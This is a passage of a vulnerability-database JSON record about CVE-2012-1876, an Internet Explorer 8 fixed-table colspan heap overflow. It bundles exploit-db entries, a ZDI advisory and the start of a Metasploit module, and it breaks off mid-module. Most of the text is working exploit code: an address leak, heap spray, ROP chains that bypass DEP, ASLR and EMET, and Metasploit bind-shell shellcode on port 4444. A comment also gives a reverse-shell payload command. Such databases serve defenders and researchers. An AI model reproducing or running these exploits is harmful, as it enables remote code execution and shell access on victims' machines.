rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n\r\n var shellcode = unescape(\"%u4444\");\r\n while (shellcode.length < 100)\r\n shellcode = shellcode + shellcode;\r\n var shellcode = shellcode.substr(0, 46);\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // EMET disable part 0x01 annihilate ROP protections\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument) \r\n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \r\n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\" \r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue \r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\r\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) \r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\r\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\r\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\r\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n\r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n\r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n\r\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread \r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV EAX,DWORD PTR DS:[007D25F48H]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1312272\"; // 0x07D25E40\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35273/"}, {"lastseen": "2016-02-02T22:19:43", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass (MS12-037). CVE-2012-1876. Remote exploit for windows platform", "published": "2013-01-10T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "id": "EDB-ID:24017", "href": "https://www.exploit-db.com/exploits/24017/", "sourceData": "<!--\r\n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass\r\n** Author: sickness@offsec.com\r\n** Thanks to Ryujin, Dookie and mr_me :) for their help.\r\n\r\n####################################################################\r\n\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb\r\n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514\r\n** Old version of the exploit available at: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24017-old.zip\r\n\r\n####################################################################\r\n\r\n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)\r\n** To get it working on a different version of Windows you will require to make your own chances to the exploit :)\r\n** Have fun :)\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00c2\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // Standard DEP bypass\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp\r\n // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24017/"}], "zdi": [{"lastseen": "2020-06-22T11:41:01", "bulletinFamily": "info", "cvelist": ["CVE-2012-1876"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles dynamically changed colspans on a column in a table with the table-layout:fixed style. If the colspan is increased after initial creation it will result in a heap overflow. This can lead to remote code execution under the context of the current program.", "edition": 3, "modified": "2012-06-22T00:00:00", "published": "2012-06-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-093/", "id": "ZDI-12-093", "title": "(Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T14:35:40", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-74062", "id": "SSV:74062", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_minver => "8.0",\r\n\t\t:ua_maxver => "8.0",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow vulnerability in Internet Explorer caused\r\n\t\t\t\tby an incorrect handling of the span attribute for col elements from a fixed table,\r\n\t\t\t\twhen they are modified dynamically by javascript code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Alexandre Pelletier', # Vulnerability analysis\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'binjo', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Help with the Metasploit module\r\n\t\t\t\t\t'juan' # Help with the Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-1876' ],\r\n\t\t\t\t\t[ 'OSVDB', '82866'],\r\n\t\t\t\t\t[ 'BID', '53848' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-037' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7 SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 12 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[1] #IE 8 on Windows XP SP3\r\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[2] #IE 8 on Windows 7 with JRE\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack("V").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack("V").first\r\n\tend\r\n\r\n\tdef get_payload(t)\r\n\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\t\twhen :msvcrt\r\n\t\t\t\tprint_status("Using msvcrt ROP")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x77c4ec01, # retn\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c15ed5, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; 